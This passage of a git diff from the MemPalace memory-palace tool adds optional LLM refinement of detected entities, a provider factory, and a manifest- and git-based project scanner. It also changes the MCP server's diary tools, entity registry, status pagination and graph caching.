+            f"{self.endpoint}/v1/messages", body, headers=headers, timeout=self.timeout
+        )
+        try:
+            text = "".join(
+                b.get("text", "") for b in data.get("content", []) or [] if b.get("type") == "text"
+            )
+        except (AttributeError, TypeError) as e:
+            raise LLMError(f"Unexpected response shape: {e}") from e
+        if not text:
+            raise LLMError(f"Empty response from Anthropic (model={self.model})")
+        return LLMResponse(text=text, model=self.model, provider=self.name, raw=data)
+
+
+# ==================== FACTORY ====================
+
+
+PROVIDERS: dict[str, type[LLMProvider]] = {
+    "ollama": OllamaProvider,
+    "openai-compat": OpenAICompatProvider,
+    "anthropic": AnthropicProvider,
+}
+
+
+def get_provider(
+    name: str,
+    model: str,
+    endpoint: Optional[str] = None,
+    api_key: Optional[str] = None,
+    timeout: int = 120,
+) -> LLMProvider:
+    """Build a provider by name. Raises LLMError on unknown provider."""
+    cls = PROVIDERS.get(name)
+    if cls is None:
+        raise LLMError(f"Unknown provider '{name}'. Choices: {sorted(PROVIDERS.keys())}")
+    return cls(model=model, endpoint=endpoint, api_key=api_key, timeout=timeout)
diff --git a/mempalace/llm_refine.py b/mempalace/llm_refine.py
new file mode 100644
index 000000000..faa737ae4
--- /dev/null
+++ b/mempalace/llm_refine.py
@@ -0,0 +1,446 @@
+"""
+llm_refine.py — Optional LLM refinement of regex-detected entities.
+
+Takes the candidate set produced by phase-1 detection (manifests, git
+authors, regex on prose) and asks an LLM to reclassify each candidate as
+PERSON / PROJECT / TOPIC / COMMON_WORD / AMBIGUOUS.
+
+Design constraints:
+- Opt-in. Default init path never imports this module.
+- Local-first by default (Ollama).
+- Interactive UX: visible progress, clean cancellation (Ctrl-C returns
+  whatever was classified before the interrupt).
+- Don't feed the raw corpus to the LLM — feed candidates + a few sampled
+  context lines each. Keeps total input to ~50-100K tokens even for huge
+  prose corpora.
+
+Public:
+    refine_entities(detected, corpus_text, provider, ...) -> dict
+"""
+
+from __future__ import annotations
+
+import json
+import re
+import sys
+from dataclasses import dataclass
+
+from mempalace.llm_client import LLMError, LLMProvider
+
+
+BATCH_SIZE = 25  # candidates per LLM call; tuned for 4B local models
+CONTEXT_LINES_PER_CANDIDATE = 3
+CONTEXT_WINDOW_CHARS = 240  # max chars per context line to keep tokens bounded
+
+# Valid labels the LLM is allowed to return. Anything else is treated as
+# AMBIGUOUS so the user reviews it.
+VALID_LABELS = {"PERSON", "PROJECT", "TOPIC", "COMMON_WORD", "AMBIGUOUS"}
+
+
+SYSTEM_PROMPT = """You are helping organize a user's memory palace by classifying capitalized tokens found in their files.
+
+For each candidate, pick exactly ONE label:
+- PERSON: a specific real person the user knows (colleague, family, character they write about)
+- PROJECT: a named product, codebase, or effort the user works on
+- TOPIC: a recurring theme or subject (not a person, not a project) — cities, technologies, concepts
+- COMMON_WORD: an English word, verb, or fragment that isn't a named entity at all (e.g. "Created", "Before", "Never")
+- AMBIGUOUS: context is insufficient to decide between two of the above
+
+Frameworks, runtimes, APIs, cloud services, vendors, and third-party products
+(e.g. Angular, OpenAPI, Terraform, Bun, Google) are TOPIC unless the context
+clearly says this is the user's own named codebase, product, or active effort.
+
+Use the provided context lines to disambiguate. A capitalized word that only appears in metadata ("Created: 2026-04-24") is COMMON_WORD. A name that appears with pronouns and dialogue is PERSON.
+
+Respond with JSON only. Schema:
+{"classifications": [{"name": "<exact candidate name>", "label": "<LABEL>", "reason": "<one short sentence>"}]}
+
+One entry per candidate, same order as the input."""
+
+
+@dataclass
+class RefineResult:
+    merged: dict  # updated detected dict
+    reclassified: int  # entries whose type changed
+    dropped: int  # entries removed from the merged result (COMMON_WORD only)
+    errors: list[str]  # per-batch error messages (transport/parse failures)
+    batches_completed: int
+    batches_total: int
+    cancelled: bool
+
+
+def _collect_contexts(
+    corpus_lines: list[str], name: str, max_lines: int = CONTEXT_LINES_PER_CANDIDATE
+) -> list[str]:
+    """Return up to `max_lines` distinct lines from the corpus that mention `name`.
+
+    Case-insensitive token-boundary match. Lines are truncated to
+    CONTEXT_WINDOW_CHARS chars to keep token usage bounded.
+    """
+    needle = re.compile(rf"(?<!\w){re.escape(name)}(?!\w)", re.IGNORECASE)
+    seen: set[str] = set()
+    out: list[str] = []
+    for line in corpus_lines:
+        if not needle.search(line):
+            continue
+        trimmed = line.strip()[:CONTEXT_WINDOW_CHARS]
+        if not trimmed or trimmed in seen:
+            continue
+        seen.add(trimmed)
+        out.append(trimmed)
+        if len(out) >= max_lines:
+            break
+    return out
+
+
+def _build_user_prompt(candidates_with_contexts: list[tuple[str, str, list[str]]]) -> str:
+    """Shape: for each candidate, list its current type guess + sampled contexts."""
+    parts: list[str] = ["CANDIDATES:"]
+    for i, (name, current_type, contexts) in enumerate(candidates_with_contexts, 1):
+        parts.append(f"\n{i}. {name}  (currently: {current_type})")
+        if contexts:
+            for c in contexts:
+                parts.append(f"   > {c}")
+        else:
+            parts.append("   > (no context available)")
+    return "\n".join(parts)
+
+
+def _extract_json_candidates(text: str) -> list[str]:
+    """Return plausible JSON payloads extracted from an LLM response."""
+    text = text.strip()
+    if not text:
+        return []
+
+    candidates: list[str] = [text]
+
+    for match in re.finditer(r"```(?:json)?\s*([\s\S]*?)\s*```", text, re.IGNORECASE):
+        candidate = match.group(1).strip()
+        if candidate and candidate not in candidates:
+            candidates.append(candidate)
+
+    for start, opener in ((i, ch) for i, ch in enumerate(text) if ch in "{["):
+        closer = "}" if opener == "{" else "]"
+        depth = 0
+        in_string = False
+        escaped = False
+        for i in range(start, len(text)):
+            ch = text[i]
+            if in_string:
+                if escaped:
+                    escaped = False
+                elif ch == "\\":
+                    escaped = True
+                elif ch == '"':
+                    in_string = False
+                continue
+
+            if ch == '"':
+                in_string = True
+            elif ch == opener:
+                depth += 1
+            elif ch == closer:
+                depth -= 1
+                if depth == 0:
+                    candidate = text[start : i + 1].strip()
+                    if candidate and candidate not in candidates:
+                        candidates.append(candidate)
+                    break
+
+    return candidates
+
+
+def _parse_response(text: str, expected_names: list[str]) -> dict[str, tuple[str, str]]:
+    """Parse the LLM's JSON response into {name: (label, reason)}.
+
+    Robust to the model occasionally wrapping JSON in text or returning
+    slight schema variations. Falls back to matching by candidate name.
+    """
+    data = None
+    for candidate in _extract_json_candidates(text):
+        try:
+            data = json.loads(candidate)
+            break
+        except json.JSONDecodeError:
+            continue
+    if data is None:
+        return {}
+
+    entries = data.get("classifications") if isinstance(data, dict) else data
+    if not isinstance(entries, list):
+        return {}
+
+    name_to_label: dict[str, tuple[str, str]] = {}
+    expected_set = {n.lower(): n for n in expected_names}
+    for entry in entries:
+        if not isinstance(entry, dict):
+            continue
+        name = entry.get("name") or entry.get("candidate")
+        label = entry.get("label") or entry.get("type") or entry.get("classification")
+        reason = entry.get("reason") or ""
+        if not isinstance(name, str) or not isinstance(label, str):
+            continue
+        # Restore canonical casing from expected_names
+        canonical = expected_set.get(name.lower(), name)
+        lbl = label.strip().upper()
+        if lbl not in VALID_LABELS:
+            lbl = "AMBIGUOUS"
+        name_to_label[canonical] = (lbl, reason.strip()[:120])
+    return name_to_label
+
+
+def _apply_classifications(
+    detected: dict,
+    decisions: dict[str, tuple[str, str]],
+    allow_project_promotions: bool = True,
+) -> tuple[dict, int, int]:
+    """Merge LLM decisions back into the detected dict.
+
+    Returns (new_detected, reclassified_count, dropped_count).
+    """
+    label_to_bucket = {
+        "PERSON": "people",
+        "PROJECT": "projects",
+        "TOPIC": "uncertain",
+        "AMBIGUOUS": "uncertain",
+    }
+
+    # Index every entity by name for in-place update
+    all_entries: list[tuple[str, dict]] = []
+    for bucket, items in detected.items():
+        for e in items:
+            all_entries.append((bucket, e))
+
+    reclassified = 0
+    dropped = 0
+    new_detected: dict[str, list[dict]] = {
+        "people": [],
+        "projects": [],
+        "uncertain": [],
+    }
+
+    for old_bucket, entry in all_entries:
+        decision = decisions.get(entry["name"])
+        if decision is None:
+            # No LLM opinion — keep as-is
+            new_detected[old_bucket].append(entry)
+            continue
+
+        label, reason = decision
+        if label == "COMMON_WORD":
+            dropped += 1
+            continue
+
+        target_bucket = label_to_bucket[label]
+        if (
+            label == "PROJECT"
+            and not allow_project_promotions
+            and not _is_authoritative_project(entry)
+        ):
+            target_bucket = "uncertain"
+        updated = dict(entry)
+        # Append the LLM's reason as a new signal so the user sees why it moved
+        signals = list(updated.get("signals", []))
+        signals.append(f"LLM: {label.lower()} — {reason}" if reason else f"LLM: {label.lower()}")
+        updated["signals"] = signals
+        if target_bucket != old_bucket:
+            reclassified += 1
+            updated["type"] = (
+                "person"
+                if target_bucket == "people"
+                else "project"
+                if target_bucket == "projects"
+                else "uncertain"
+            )
+        new_detected[target_bucket].append(updated)
+
+    return new_detected, reclassified, dropped
+
+
+def _is_authoritative_person(entry: dict) -> bool:
+    """Return True for git-author people that should not be second-guessed."""
+    signals = " ".join(entry.get("signals", [])).lower()
+    return "commit" in signals and "repo" in signals
+
+
+def _is_authoritative_project(entry: dict) -> bool:
+    """Return True for manifest/git-backed projects that are already source-backed."""
+    signals = " ".join(entry.get("signals", [])).lower()
+    manifest_markers = ("package.json", "pyproject.toml", "cargo.toml", "go.mod")
+    return any(marker in signals for marker in manifest_markers) or "commit" in signals
+
+
+def _print_progress(batch_idx: int, total: int, current_name: str) -> None:
+    """Overwrite-line progress indicator."""
+    width = 40
+    filled = int(width * batch_idx / total) if total else 0
+    bar = "█" * filled + "░" * (width - filled)
+    msg = f"\r  LLM refine: [{bar}] batch {batch_idx}/{total}  current: {current_name[:30]:<30}"
+    sys.stderr.write(msg)
+    sys.stderr.flush()
+
+
+def refine_entities(
+    detected: dict,
+    corpus_text: str,
+    provider: LLMProvider,
+    batch_size: int = BATCH_SIZE,
+    show_progress: bool = True,
+    allow_project_promotions: bool = True,
+) -> RefineResult:
+    """Reclassify detected entities using the LLM provider.
+
+    Only regex-derived candidates are sent for refinement. Git authors and
+    manifest/git-backed projects are already source-backed and don't benefit
+    from LLM second-guessing.
+
+    Ctrl-C during refinement: cancels the remaining batches, returns a
+    RefineResult with ``cancelled=True`` and whatever was classified before
+    the interrupt. The partial result is safe to pass straight to
+    ``confirm_entities``.
+
+    Transport or parse failures in individual batches are recorded in
+    ``errors`` and do not abort the run.
+
+    ``allow_project_promotions=False`` keeps LLM-only project guesses in the
+    uncertain bucket. This is useful when manifest/git signal already supplied
+    canonical projects and regex/LLM hits are likely tools, vendors, or topics.
+    """
+    candidates: list[tuple[str, str]] = []
+    current_type = {"people": "person", "projects": "project", "uncertain": "uncertain"}
+    for bucket in ("people", "projects", "uncertain"):
+        for e in detected.get(bucket, []):
+            if bucket == "people" and _is_authoritative_person(e):
+                continue
+            if bucket == "projects" and _is_authoritative_project(e):
+                continue
+            candidates.append((e["name"], current_type[bucket]))
+
+    corpus_lines = corpus_text.splitlines() if corpus_text else []
+
+    # Deduplicate candidate names while preserving order
+    seen: set[str] = set()
+    unique: list[tuple[str, str]] = []
+    for name, kind in candidates:
+        if name not in seen:
+            seen.add(name)
+            unique.append((name, kind))
+
+    if not unique:
+        return RefineResult(
+            merged=detected,
+            reclassified=0,
+            dropped=0,
+            errors=[],
+            batches_completed=0,
+            batches_total=0,
+            cancelled=False,
+        )
+
+    # Build batches
+    batches: list[list[tuple[str, str, list[str]]]] = []
+    for i in range(0, len(unique), batch_size):
+        chunk = unique[i : i + batch_size]
+        enriched = [(name, kind, _collect_contexts(corpus_lines, name)) for name, kind in chunk]
+        batches.append(enriched)
+
+    all_decisions: dict[str, tuple[str, str]] = {}
+    errors: list[str] = []
+    completed = 0
+    cancelled = False
+
+    for idx, batch in enumerate(batches, 1):
+        if show_progress and batch:
+            _print_progress(idx - 1, len(batches), batch[0][0])
+        user_prompt = _build_user_prompt(batch)
+        try:
+            resp = provider.classify(SYSTEM_PROMPT, user_prompt, json_mode=True)
+        except KeyboardInterrupt:
+            cancelled = True
+            break
+        except LLMError as e:
+            errors.append(f"batch {idx}: {e}")
+            continue
+        names_in_batch = [name for name, _, _ in batch]
+        decisions = _parse_response(resp.text, names_in_batch)
+        if not decisions:
+            errors.append(f"batch {idx}: could not parse response")
+        all_decisions.update(decisions)
+        completed += 1
+        if show_progress:
+            _print_progress(idx, len(batches), batch[-1][0])
+
+    if show_progress:
+        sys.stderr.write("\n")
+        sys.stderr.flush()
+
+    merged, reclassified, dropped = _apply_classifications(
+        detected,
+        all_decisions,
+        allow_project_promotions=allow_project_promotions,
+    )
+
+    return RefineResult(
+        merged=merged,
+        reclassified=reclassified,
+        dropped=dropped,
+        errors=errors,
+        batches_completed=completed,
+        batches_total=len(batches),
+        cancelled=cancelled,
+    )
+
+
+def collect_corpus_text(
+    project_dir: str,
+    max_files: int = 30,
+    max_bytes_per_file: int = 20_000,
+) -> str:
+    """Gather prose text from ``project_dir`` for use as LLM context source.
+
+    Stratified: reads up to ``max_files`` prose files (``.md``, ``.txt``,
+    ``.rst``), preferring recently-modified. Each file capped at
+    ``max_bytes_per_file`` to bound total input.
+    """
+    from pathlib import Path
+
+    from mempalace.entity_detector import PROSE_EXTENSIONS, SKIP_DIRS
+
+    root = Path(project_dir).expanduser().resolve()
+    if not root.is_dir():
+        return ""
+    candidates: list[tuple[float, Path]] = []
+    for dirpath, dirs, files in _walk_prose(root, SKIP_DIRS):
+        for fname in files:
+            p = dirpath / fname
+            if p.suffix.lower() not in PROSE_EXTENSIONS:
+                continue
+            try:
+                mtime = p.stat().st_mtime
+            except OSError:
+                continue
+            candidates.append((mtime, p))
+    candidates.sort(reverse=True)
+    selected = [p for _, p in candidates[:max_files]]
+    chunks: list[str] = []
+    for p in selected:
+        try:
+            with open(p, encoding="utf-8", errors="replace") as f:
+                chunks.append(f.read(max_bytes_per_file))
+        except OSError:
+            continue
+    return "\n".join(chunks)
+
+
+def _walk_prose(root, skip_dirs):
+    """Walk a directory yielding (Path, dirs, files), pruning skip_dirs.
+
+    Inlined from ``project_scanner._walk`` to avoid a private-name import
+    coupling. Functionality is intentionally narrow: prose collection only.
+    """
+    import os
+    from pathlib import Path
+
+    for dirpath, dirs, files in os.walk(root):
+        dirs[:] = [d for d in dirs if d not in skip_dirs and not d.startswith(".")]
+        yield Path(dirpath), dirs, files
diff --git a/mempalace/mcp_server.py b/mempalace/mcp_server.py
index 06355c46e..2650e3073 100644
--- a/mempalace/mcp_server.py
+++ b/mempalace/mcp_server.py
@@ -2,7 +2,7 @@
 """
 MemPalace MCP Server — read/write palace access for Claude Code
 ================================================================
-Install: claude mcp add mempalace -- python -m mempalace.mcp_server [--palace /path/to/palace]
+Install: claude mcp add mempalace -- mempalace-mcp [--palace /path/to/palace]
 
 Tools (read):
   mempalace_status          — total drawers, wing/room breakdown
@@ -285,7 +285,7 @@ def _get_cached_metadata(col, where=None):
 
 def _sanitize_optional_name(value: str = None, field_name: str = "name") -> str:
     """Validate optional wing/room-style filters."""
-    if value is None:
+    if value is None or not value.strip():
         return None
     return sanitize_name(value, field_name)
 
@@ -918,10 +918,10 @@ def tool_kg_stats():
 # ==================== AGENT DIARY ====================
 
 
-def tool_diary_write(agent_name: str, entry: str, topic: str = "general"):
+def tool_diary_write(agent_name: str, entry: str, topic: str = "general", wing: str = ""):
     """
-    Write a diary entry for this agent. Each agent gets its own wing
-    with a diary room. Entries are timestamped and accumulate over time.
+    Write a diary entry for this agent. Entries are timestamped and
+    accumulate over time in a diary room.
 
     This is the agent's personal journal — observations, thoughts,
     what it worked on, what it noticed, what it thinks matters.
@@ -932,7 +932,10 @@ def tool_diary_write(agent_name: str, entry: str, topic: str = "general"):
     except ValueError as e:
         return {"success": False, "error": str(e)}
 
-    wing = f"wing_{agent_name.lower().replace(' ', '_')}"
+    if wing:
+        wing = sanitize_name(wing)
+    else:
+        wing = f"wing_{agent_name.lower().replace(' ', '_')}"
     room = "diary"
     col = _get_collection(create=True)
     if not col:
@@ -987,24 +990,38 @@ def tool_diary_write(agent_name: str, entry: str, topic: str = "general"):
         return {"success": False, "error": str(e)}
 
 
-def tool_diary_read(agent_name: str, last_n: int = 10):
+def tool_diary_read(agent_name: str, last_n: int = 10, wing: str = ""):
     """
     Read an agent's recent diary entries. Returns the last N entries
     in chronological order — the agent's personal journal.
+
+    When ``wing`` is provided, reads only from that wing. When ``wing``
+    is empty or omitted, returns entries from every wing this agent has
+    written to. Diary writes from hooks land in project-derived wings
+    (``wing_<project>``), so requiring a specific wing on read would
+    silo those entries from agent-initiated reads.
     """
     try:
         agent_name = sanitize_name(agent_name, "agent_name")
+        if wing:
+            wing = sanitize_name(wing)
     except ValueError as e:
         return {"error": str(e)}
     last_n = max(1, min(last_n, 100))
-    wing = f"wing_{agent_name.lower().replace(' ', '_')}"
     col = _get_collection()
     if not col:
         return _no_palace()
 
+    # Build filter: always scope by agent + room=diary. Wing is optional —
+    # when empty, return entries across all wings for this agent (matches
+    # the #1097 empty-string-as-no-filter convention for LLM ergonomics).
+    conditions = [{"room": "diary"}, {"agent": agent_name}]
+    if wing:
+        conditions.insert(0, {"wing": wing})
+
     try:
         results = col.get(
-            where={"$and": [{"wing": wing}, {"room": "diary"}]},
+            where={"$and": conditions},
             include=["documents", "metadatas"],
             limit=10000,
         )
@@ -1497,6 +1514,10 @@ def tool_reconnect():
                     "type": "string",
                     "description": "Topic tag (optional, default: general)",
                 },
+                "wing": {
+                    "type": "string",
+                    "description": "Target wing for this diary entry (optional). If omitted, uses wing_{agent_name}. Use this to write diary entries to a project wing instead of an agent-specific wing.",
+                },
             },
             "required": ["agent_name", "entry"],
         },
@@ -1515,6 +1536,10 @@ def tool_reconnect():
                     "type": "integer",
                     "description": "Number of recent entries to read (default: 10)",
                 },
+                "wing": {
+                    "type": "string",
+                    "description": "Wing to read diary entries from (optional). If omitted, reads from wing_{agent_name}.",
+                },
             },
             "required": ["agent_name"],
         },
diff --git a/mempalace/miner.py b/mempalace/miner.py
index 56b767f78..9e8ff5eb7 100644
--- a/mempalace/miner.py
+++ b/mempalace/miner.py
@@ -52,6 +52,7 @@
 }
 
 SKIP_FILENAMES = {
+    "entities.json",
     "mempalace.yaml",
     "mempalace.yml",
     "mempal.yaml",
@@ -471,6 +472,97 @@ def _load_known_entities_raw() -> dict:
     return dict(_ENTITY_REGISTRY_CACHE["raw"])
 
 
+def add_to_known_entities(entities_by_category: dict) -> str:
+    """Union ``entities_by_category`` into ``~/.mempalace/known_entities.json``.
+
+    Accepts ``{category: [names]}`` shape as produced by ``mempalace init``
+    and merges into the registry the miner reads at mine time. Existing
+    categories are preserved untouched unless also present in the input;
+    for categories present in both, entries are unioned case-insensitively
+    without changing the on-disk ordering of pre-existing names.
+
+    If a category is stored on-disk as ``{name: code}`` (the alternate
+    miner-supported shape, used by dialect-style configs), new names are
+    added as keys with ``None`` values so existing code mappings aren't
+    overwritten. A later compress pass can assign codes.
+
+    The in-process cache is invalidated on write so same-process callers
+    (notably ``cmd_init`` → ``cmd_mine`` in sequence) see the update
+    immediately instead of waiting for a mtime re-check.
+
+    Returns the registry path as a string for logging.
+    """
+    import json as _json
+    from pathlib import Path as _Path
+
+    registry_path = _Path(_ENTITY_REGISTRY_PATH)
+    registry_path.parent.mkdir(parents=True, exist_ok=True)
+
+    existing: dict = {}
+    if registry_path.exists():
+        try:
+            loaded = _json.loads(registry_path.read_text(encoding="utf-8"))
+            if isinstance(loaded, dict):
+                existing = loaded
+        except (_json.JSONDecodeError, OSError):
+            existing = {}
+
+    def _coerce_name(value):
+        if not value:
+            return None
+        name = str(value)
+        return name if name else None
+
+    for category, names in entities_by_category.items():
+        if not isinstance(names, list) or not names:
+            continue
+        current = existing.get(category)
+        if isinstance(current, list):
+            seen_lower = {str(n).lower() for n in current}
+            for n in names:
+                name = _coerce_name(n)
+                if not name:
+                    continue
+                if name.lower() not in seen_lower:
+                    current.append(name)
+                    seen_lower.add(name.lower())
+        elif isinstance(current, dict):
+            seen_lower = {str(name).lower() for name in current}
+            for n in names:
+                name = _coerce_name(n)
+                if not name or name.lower() in seen_lower:
+                    continue
+                current[name] = None
+                seen_lower.add(name.lower())
+        else:
+            # Missing or unrecognized shape — seed as a fresh list, deduped
+            seen: set = set()
+            ordered: list = []
+            for n in names:
+                name = _coerce_name(n)
+                if not name:
+                    continue
+                key = name.lower()
+                if key in seen:
+                    continue
+                seen.add(key)
+                ordered.append(name)
+            existing[category] = ordered
+
+    registry_path.write_text(_json.dumps(existing, indent=2, ensure_ascii=False), encoding="utf-8")
+    try:
+        registry_path.chmod(0o600)
+    except (OSError, NotImplementedError):
+        pass
+
+    # Invalidate in-process cache so later calls in the same run see the write.
+    _ENTITY_REGISTRY_CACHE["mtime"] = None
+    _ENTITY_REGISTRY_CACHE["names"] = frozenset()
+    _ENTITY_REGISTRY_CACHE["raw"] = {}
+
+    return str(registry_path)
+
+
 _HALL_KEYWORDS_CACHE = None
 
 
@@ -847,18 +939,24 @@ def status(palace_path: str):
         print("  Run: mempalace init <dir> then mempalace mine <dir>")
         return
 
-    # Count by wing and room
+    # Count by wing and room — paginate to avoid SQLite "too many SQL
+    # variables" error on large palaces (see #802, #850).
     total = col.count()
-    r = col.get(limit=total, include=["metadatas"]) if total else {"metadatas": []}
-    metas = r["metadatas"]
-
-    wing_rooms = defaultdict(lambda: defaultdict(int))
-    for m in metas:
-        m = m or {}
-        wing_rooms[m.get("wing", "?")][m.get("room", "?")] += 1
+    wing_rooms: dict = defaultdict(lambda: defaultdict(int))
+    batch_size = 5000
+    offset = 0
+    while offset < total:
+        r = col.get(limit=batch_size, offset=offset, include=["metadatas"])
+        batch = r["metadatas"]
+        if not batch:
+            break
+        for m in batch:
+            m = m or {}
+            wing_rooms[m.get("wing", "?")][m.get("room", "?")] += 1
+        offset += len(batch)
 
     print(f"\n{'=' * 55}")
-    print(f"  MemPalace Status — {len(metas)} drawers")
+    print(f"  MemPalace Status — {total} drawers")
     print(f"{'=' * 55}\n")
     for wing, rooms in sorted(wing_rooms.items()):
         print(f"  WING: {wing}")
diff --git a/mempalace/palace_graph.py b/mempalace/palace_graph.py
index 71cad89ec..125ec0d4a 100644
--- a/mempalace/palace_graph.py
+++ b/mempalace/palace_graph.py
@@ -18,6 +18,8 @@
 import hashlib
 import json
 import os
+import threading
+import time
 from collections import Counter, defaultdict
 from datetime import datetime, timezone
 
@@ -25,6 +27,23 @@
 from .palace import get_collection as _get_palace_collection
 from .palace import mine_lock
 
+# Module-level graph cache with TTL and write-invalidation.
+# Warm cache serves build_graph() in O(1); invalidate_graph_cache() clears on writes.
+_graph_cache_lock = threading.Lock()
+_graph_cache_nodes = None
+_graph_cache_edges = None
+_graph_cache_time = 0.0
+_GRAPH_CACHE_TTL = 60.0  # seconds — graph changes less often than metadata
+
+
+def invalidate_graph_cache():
+    """Clear the graph cache. Called from mcp_server.py on writes."""
+    global _graph_cache_nodes, _graph_cache_edges, _graph_cache_time
+    with _graph_cache_lock:
+        _graph_cache_nodes = None
+        _graph_cache_edges = None
+        _graph_cache_time = 0.0
+
 
 def _get_collection(config=None):
     config = config or MempalaceConfig()
@@ -42,10 +61,25 @@ def build_graph(col=None, config=None):
     """
     Build the palace graph from ChromaDB metadata.
 
+    Returns cached result if fresh (within TTL). Cache is invalidated
+    on writes via invalidate_graph_cache(). Thread-safe via _graph_cache_lock.
+
+    Note: warm cache ignores ``col`` and ``config`` arguments — this is
+    intentional for the MCP server's single-palace use case. Callers
+    switching collections should call ``invalidate_graph_cache()`` first.
+
     Returns:
         nodes: dict of {room: {wings: set, halls: set, count: int}}
         edges: list of {room, wing_a, wing_b, hall} — one per tunnel crossing
     """
+    global _graph_cache_nodes, _graph_cache_edges, _graph_cache_time
+    now = time.time()
+    # NOTE: warm cache ignores col/config args — intentional for the MCP server's
+    # single-palace use case. Callers switching collections must invalidate first.
+    with _graph_cache_lock:
+        if _graph_cache_nodes is not None and (now - _graph_cache_time) < _GRAPH_CACHE_TTL:
+            return _graph_cache_nodes, _graph_cache_edges
+
     if col is None:
         col = _get_collection(config)
     if not col:
@@ -101,6 +135,14 @@ def build_graph(col=None, config=None):
             "dates": sorted(data["dates"])[-5:] if data["dates"] else [],
         }
 
+    # Only cache non-empty graphs so new data is picked up immediately
+    # when the palace is first populated.
+    if nodes:
+        with _graph_cache_lock:
+            _graph_cache_nodes = nodes
+            _graph_cache_edges = edges
+            _graph_cache_time = time.time()
+
     return nodes, edges
 
 
diff --git a/mempalace/project_scanner.py b/mempalace/project_scanner.py
new file mode 100644
index 000000000..741a3e2e2
--- /dev/null
+++ b/mempalace/project_scanner.py
@@ -0,0 +1,716 @@
+"""
+project_scanner.py — Detect projects and people from real signal.
+
+For a codebase with build manifests or git history, this beats regex-based
+entity detection by a wide margin: the project's own name is already written
+down in package.json / pyproject.toml / Cargo.toml / go.mod, and the people
+who worked on it are in `git log`.
+
+This module is used as the primary signal in `mempalace init`. The regex
+detector in entity_detector.py stays as a fallback for prose-only folders
+(notes, research, writing).
+
+Public:
+    scan(root) -> (projects, people)
+    to_detected_dict(projects, people) -> {people: [...], projects: [...], uncertain: []}
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import re
+import subprocess
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Optional
+
+try:
+    import tomllib  # Python 3.11+
+except ImportError:  # pragma: no cover
+    try:
+        import tomli as tomllib  # Python 3.9/3.10 backport
+    except ImportError:
+        tomllib = None  # type: ignore
+
+
+SKIP_DIRS = {
+    ".git",
+    "node_modules",
+    "__pycache__",
+    ".venv",
+    "venv",
+    "env",
+    "dist",
+    "build",
+    ".next",
+    "coverage",
+    ".terraform",
+    "vendor",
+    "target",
+    ".mempalace",
+    ".cache",
+    ".pytest_cache",
+    ".mypy_cache",
+    ".ruff_cache",
+}
+
+MAX_DEPTH = 6
+MAX_COMMITS_PER_REPO = 1000
+GIT_TIMEOUT = 10
+
+
+# ==================== DATACLASSES ====================
+
+
+@dataclass
+class ProjectInfo:
+    name: str
+    repo_root: Path
+    manifest: Optional[str] = None
+    has_git: bool = False
+    total_commits: int = 0
+    user_commits: int = 0
+    is_mine: bool = False
+
+    @property
+    def confidence(self) -> float:
+        if self.is_mine:
+            return 0.99
+        if self.has_git and self.total_commits > 0:
+            return 0.7
+        return 0.85  # manifest-only, no git
+
+    def to_signal(self) -> str:
+        parts: list[str] = []
+        if self.manifest:
+            parts.append(self.manifest)
+        if self.has_git:
+            if self.is_mine and self.user_commits:
+                parts.append(f"{self.user_commits} of your commits")
+            elif self.user_commits:
+                parts.append(f"{self.user_commits}/{self.total_commits} yours")
+            else:
+                parts.append(f"{self.total_commits} commits (none by you)")
+        return ", ".join(parts) or "repo"
+
+
+@dataclass
+class PersonInfo:
+    name: str
+    total_commits: int = 0
+    emails: set[str] = field(default_factory=set)
+    repos: set[str] = field(default_factory=set)
+
+    @property
+    def confidence(self) -> float:
+        if self.total_commits >= 100 or len(self.repos) >= 3:
+            return 0.99
+        if self.total_commits >= 20:
+            return 0.85
+        return 0.65
+
+    def to_signal(self) -> str:
+        r = len(self.repos)
+        return f"{self.total_commits} commit{'s' if self.total_commits != 1 else ''} across {r} repo{'s' if r != 1 else ''}"
+
+
+# ==================== MANIFEST PARSING ====================
+
+
+def _parse_package_json(path: Path) -> Optional[str]:
+    try:
+        data = json.loads(path.read_text(encoding="utf-8", errors="replace"))
+    except (json.JSONDecodeError, OSError):
+        return None
+    name = data.get("name")
+    return name if isinstance(name, str) and name else None
+
+
+def _parse_toml(path: Path) -> dict:
+    if tomllib is None:
+        return {}
+    try:
+        with open(path, "rb") as f:
+            return tomllib.load(f)
+    except (OSError, tomllib.TOMLDecodeError):
+        return {}
+
+
+def _parse_pyproject(path: Path) -> Optional[str]:
+    data = _parse_toml(path)
+    name = data.get("project", {}).get("name")
+    if isinstance(name, str) and name:
+        return name
+    name = data.get("tool", {}).get("poetry", {}).get("name")
+    return name if isinstance(name, str) and name else None
+
+
+def _parse_cargo(path: Path) -> Optional[str]:
+    data = _parse_toml(path)
+    name = data.get("package", {}).get("name")
+    return name if isinstance(name, str) and name else None
+
+
+def _parse_gomod(path: Path) -> Optional[str]:
+    try:
+        for line in path.read_text(encoding="utf-8", errors="replace").splitlines():
+            line = line.strip()
+            if line.startswith("module "):
+                mod = line.split(None, 1)[1].strip()
+                return mod.split("/")[-1] or None
+    except OSError:
+        return None
+    return None
+
+
+MANIFEST_PRIORITY = {
+    "pyproject.toml": 0,
+    "package.json": 1,
+    "Cargo.toml": 2,
+    "go.mod": 3,
+}
+# Sentinel so unknown manifests always sort after the known manifest types above.
+UNKNOWN_MANIFEST_PRIORITY = max(MANIFEST_PRIORITY.values()) + 1
+MANIFEST_PARSERS = {
+    "package.json": _parse_package_json,
+    "pyproject.toml": _parse_pyproject,
+    "Cargo.toml": _parse_cargo,
+    "go.mod": _parse_gomod,
+}
+
+
+# ==================== GIT HELPERS ====================
+
+
+def _run_git(cwd: Path, *args: str, timeout: int = GIT_TIMEOUT) -> str:
+    try:
+        r = subprocess.run(
+            ["git", "-C", str(cwd), *args],
+            capture_output=True,
+            text=True,
+            timeout=timeout,
+            check=False,
+        )
+        return r.stdout if r.returncode == 0 else ""
+    except (OSError, subprocess.SubprocessError):
+        return ""
+
+
+def _git_user_identity(repo: Path) -> tuple[str, str]:
+    """Return (name, email) for this repo, falling back to global config."""
+    name = _run_git(repo, "config", "user.name", timeout=2).strip()
+    email = _run_git(repo, "config", "user.email", timeout=2).strip()
+    return name, email
+
+
+def _global_git_identity() -> tuple[str, str]:
+    try:
+        n = subprocess.run(
+            ["git", "config", "--global", "user.name"],
+            capture_output=True,
+            text=True,
+            timeout=2,
+            check=False,
+        ).stdout.strip()
+        e = subprocess.run(
+            ["git", "config", "--global", "user.email"],
+            capture_output=True,
+            text=True,
+            timeout=2,
+            check=False,
+        ).stdout.strip()
+        return n, e
